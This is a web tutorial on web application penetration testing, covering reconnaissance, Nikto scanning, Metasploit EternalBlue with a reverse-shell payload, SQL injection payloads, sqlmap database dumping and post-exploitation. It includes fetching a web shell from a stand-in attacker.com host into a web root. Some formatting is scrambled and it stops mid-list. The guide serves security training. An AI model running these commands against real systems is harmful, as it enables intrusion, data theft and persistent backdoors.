Introduction to Web Application Penetration Testing
Web application penetration testing is the process of attacking a web application to uncover security vulnerabilities, misconfigurations, and weaknesses that could be exploited by malicious actors. This type of testing plays a vital role in ensuring that applications are robust against threats like SQL injection, cross-site scripting (XSS), insecure authentication, and session management flaws. In this guide, we'll explore the tools and techniques used to assess web applications, including scanning for common vulnerabilities with tools like OWASP ZAP and Burp Suite, exploiting discovered weaknesses, and testing for logic flaws that automated tools may miss. We will also cover techniques for intercepting and analyzing web traffic, evaluating input validation, and testing the security of application components like APIs. The goal is to ethically discover and document vulnerabilities, following a responsible disclosure process to ensure that they are addressed before they can be exploited in the wild, improving the overall security posture of the application.
Video Credit: Loi Liang Yang- Website Hacking
Reconnaissance and Information Gathering
Reconnaissance is the first step of web application penetration testing, where you gather as much information as possible about the target web application.
Using Nmap to Scan a Website
Nmap can be used to scan websites and gather information such as open ports and services running on the server. The following command can be used to scan a target website:
nmap -sV -p- -A example.com
Explanation:
-sV
: Service version detection-p-
: Scan all 65535 ports-A
: Enables OS detection, version detection, script scanning, and traceroute
This command helps in identifying which services are running and which versions are being used, which is crucial for detecting vulnerabilities.
Finding Domains and Subdomains
Finding subdomains is important because they can reveal hidden parts of an application that may be less secure. The following tools are commonly used for subdomain enumeration:
- Sublist3r: A powerful subdomain enumeration tool.
- Amass: A tool used to perform DNS enumeration, scraping, and analysis.
Using Sublist3r to find subdomains:
python sublist3r.py -d example.com
Example output:
[+] Enumerating subdomains for example.com www.example.com mail.example.com admin.example.com api.example.com
Directory Enumeration with Gobuster
Directory enumeration helps to discover hidden files and directories that may contain sensitive information or be vulnerable to attacks. Gobuster is a popular tool for performing directory enumeration on a target website.
Using Gobuster for Directory Enumeration
To use Gobuster with a wordlist to find directories on a target website, use the following command:
gobuster dir -u http://example.com -w /usr/share/seclists/Discovery/Web-Content/common.txt
Explanation:
dir
: Mode for directory enumeration.-u
: Specifies the URL to scan.-w
: Specifies the wordlist to use. In this case, the wordlist is/usr/share/seclists/Discovery/Web-Content/common.txt
.
Gobuster will attempt to find hidden directories and files on the target site using the specified wordlist. This can help reveal areas of the web application that may be vulnerable.
Identifying Vulnerabilities
Scanning with Nikto
Nikto is a web server scanner that identifies vulnerabilities, outdated software, and configuration issues. It can be a crucial tool for penetration testers and security professionals looking to find weaknesses in web servers and applications. Nikto scans for over 6,700 potentially dangerous files, outdated server versions, and configuration issues that could lead to vulnerabilities. It also checks for common files like admin panels and default login pages, which could be exploited if left unprotected.
nikto -h http://example.com
Example output:
- Nikto v2.1.6 ----------------------------------------------------------------------- + Target IP: 192.168.1.10 + Target Hostname: example.com + Target Port: 80 ----------------------------------------------------------------------- + Server: Apache/2.4.41 (Ubuntu) + The X-Frame-Options header is not present, vulnerability detected. + Outdated software detected: Apache/2.4.41 + Entry '/admin/' is password protected, brute force possible. -----------------------------------------------------------------------
Steps to Take if a Vulnerability is Found
If vulnerabilities are found during a Nikto scan, it's important to address them as soon as possible to mitigate the risk of attack. Here are the steps you should take:
Exploiting Vulnerabilities Found During Scans
After performing a scan with tools like Nmap, Nikto, or Nessus, vulnerabilities may be uncovered in software versions, misconfigurations, or exposed services. The next step is to understand how these vulnerabilities can be exploited to gain unauthorized access or compromise the system.
- What You Should Look For: Outdated software, exposed services, or weak configurations that are flagged as vulnerable. This can include software like Apache, Nginx, MySQL, and others. The CVE Database and Exploit-DB are great resources for checking known vulnerabilities (CVE) and finding available exploits.
- Steps to Take:
Once you've identified vulnerabilities, you can use a penetration testing framework like Metasploit to exploit them.
p>To start Metasploit, use the following command:msfconsole
To search for a specific vulnerability using its CVE identifier, use the following command:
search cve:2020-1472
To select the exploit module for the specific vulnerability, use this command:
use exploit/windows/smb/ms17_010_eternalblue
Set the target host IP address by using the following command:
set RHOST 192.168.1.100
Set other parameters such as the payload to be used. In this case, we're using a reverse TCP payload:
set payload windows/x64/meterpreter/reverse_tcp
Set your local host (the attacker machine) IP address:
set LHOST 192.168.1.50
Finally, run the exploit with the following command:
exploit
This example demonstrates exploiting the famous MS17-010 EternalBlue vulnerability using Metasploit. Always check for an appropriate exploit module based on the CVE found in your scan results.
- Using Manual Exploits:
Not every vulnerability will have an automatic exploit in Metasploit. For those that don't, you may need to download and run manual scripts or tools. Exploit-DB is an excellent place to find these. For example:
wget https://www.exploit-db.com/download/45270
After downloading an exploit, you may need to compile or run the script. Here is an example of running a Python script:
python3 exploit_script.py -t 192.168.1.100
Before running any exploit, be sure to carefully review its code and understand its behavior to avoid damaging the target or triggering unintended side effects.
Privilege Escalation
After gaining initial access, the next step is to elevate your privileges to an administrator or root user. This can be done by exploiting weak configurations or other software vulnerabilities. Tools like LinPEAS and GTFOBins can help identify privilege escalation vectors.
To run LinPEAS and identify potential privilege escalation opportunities, use the following command:
./linpeas.sh
SQL Injection (SQLi)
SQL Injection (SQLi) is a type of attack that allows an attacker to execute arbitrary SQL queries against a database by injecting malicious input into the application. This type of attack can lead to unauthorized access to sensitive data, data modification, or even full control over the database server.
Identifying SQL Injection Vulnerabilities
SQL injection vulnerabilities are typically found in user input fields such as login forms, search boxes, or any input that directly interacts with a backend database. The following are some methods to identify potential SQL injection points:
- Single Quote Test: Enter a single quote (
'
) into input fields and observe any errors that may indicate improper input handling. If an error similar toSQL syntax error
appears, the field may be vulnerable to SQL injection. - Boolean-Based Testing: Use logical operators to test for a difference in response. For example, enter
' OR 1=1 --
to see if it returns a valid response, indicating a possible vulnerability.
Exploiting SQL Injection
Once a potential SQL injection vulnerability has been identified, the next step is to exploit it to extract data from the database or gain control over the system. Below are some common exploitation techniques:
1. Extracting Database Information
Use a payload to determine the database version, current user, and available tables:
http://example.com/vulnerable_page.php?id=1 UNION SELECT null, version(), user(), database() --
The above payload uses a
UNION SELECT
statement to extract information about the database version, user, and current database name.2. Using Automated Tools
Manual SQL injection can be time-consuming. To automate the exploitation process, use tools like sqlmap:
sqlmap -u "http://example.com/vulnerable_page.php?id=1" --dbs
This command tells sqlmap to target the vulnerable page and enumerate the available databases.
3. Extracting Table Data
Once the databases have been identified, you can extract table names and column information:
sqlmap -u "http://example.com/vulnerable_page.php?id=1" -D database_name --tables
Replace
database_name
with the actual name of the target database. This command will list all tables in the specified database.To extract specific columns from a table:
sqlmap -u "http://example.com/vulnerable_page.php?id=1" -D database_name -T table_name --columns
Replace
table_name
with the name of the table you want to investigate.Finally, extract data from a column:
sqlmap -u "http://example.com/vulnerable_page.php?id=1" -D database_name -T table_name -C column_name --dump
This command dumps the content of the specified column.
SQL injection attacks can have severe consequences if performed improperly or maliciously.
Post-Exploitation (Web Application)
Once you have gained control over a web application, post-exploitation tasks are focused on extracting sensitive data, maintaining access, and exploring the underlying infrastructure to understand the full extent of the compromise. The main goals of post-exploitation for web applications include:
- Data Extraction: Extracting sensitive data, such as database content, API keys, user credentials, and configuration files.
- Establishing Persistence: Deploying web shells, backdoors, or modifying application files to maintain persistent access.
- Further Network Exploration: Using compromised credentials or connections to explore the internal network and identify additional systems.
Common Post-Exploitation Techniques for Web Applications
Below are some common techniques and tools used for post-exploitation tasks once a web application has been compromised:
1. Extracting Sensitive Information
Once you have access, the first step is to identify and extract sensitive information from the web server. This can include:
- Database Dumping: Use tools like sqlmap to extract the entire contents of the backend database. For example:
sqlmap -u "http://example.com/vulnerable_endpoint" --dump
This command dumps all available data from the vulnerable endpoint of the web application.
- Configuration Files: Look for configuration files (e.g.,
config.php
) that may contain sensitive information such as database credentials or API keys.
2. Web Shell Deployment for Persistence
Maintaining access is a key goal in post-exploitation. One way to achieve persistence is by uploading a web shell. This allows remote command execution on the compromised server.
wget http://attacker.com/shell.php -O /var/www/html/shell.php
In this example, a web shell named
shell.php
is uploaded to the web root directory. This allows for continued remote control of the server using a simple web-based interface.Another example is using popular web shells that support various features such as command execution, file browsing, and database access.
3. Privilege Escalation on the Web Server
If the compromised web server has limited privileges, the next step is to escalate privileges to gain full administrative control. You can use tools like:
- GTFOBins - Identifies Linux binaries that can be exploited for privilege escalation.
- LinPEAS - Scans the system to identify potential privilege escalation vectors.
Run LinPEAS to look for vulnerabilities that can be exploited to elevate privileges:
./linpeas.sh
4. Further Network Exploration
After compromising a web application, it is important to explore the underlying network to find other valuable targets. This can involve:
- Pivoting: Using compromised web servers as a stepping stone to access other internal systems.
- Port Scanning: Use tools like Nmap to scan internal network ranges for other active services:
nmap -sT -p- 192.168.1.0/24
This command scans the entire subnet to identify other potentially vulnerable systems.
- Single Quote Test: Enter a single quote (
- Staying Updated:
Vulnerabilities are discovered frequently, and it’s important to stay informed about new ones. Regularly visit sources like: